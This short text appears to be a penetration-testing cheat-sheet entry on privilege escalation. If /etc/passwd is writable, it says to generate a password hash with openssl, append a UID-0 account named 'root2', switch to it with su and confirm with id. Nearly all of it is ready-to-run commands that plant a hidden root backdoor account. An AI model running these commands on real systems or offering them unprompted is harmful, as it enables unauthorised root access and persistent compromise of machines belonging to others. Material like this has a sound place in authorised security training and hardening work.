If /etc/passwd is editable then add a user with root access in it

• Generate password hash openssl passwd evil123
• echo "root2:<passwd-hash>:0:0:root:/root:/bin/bash" >> /etc/passwd
• su root2
• id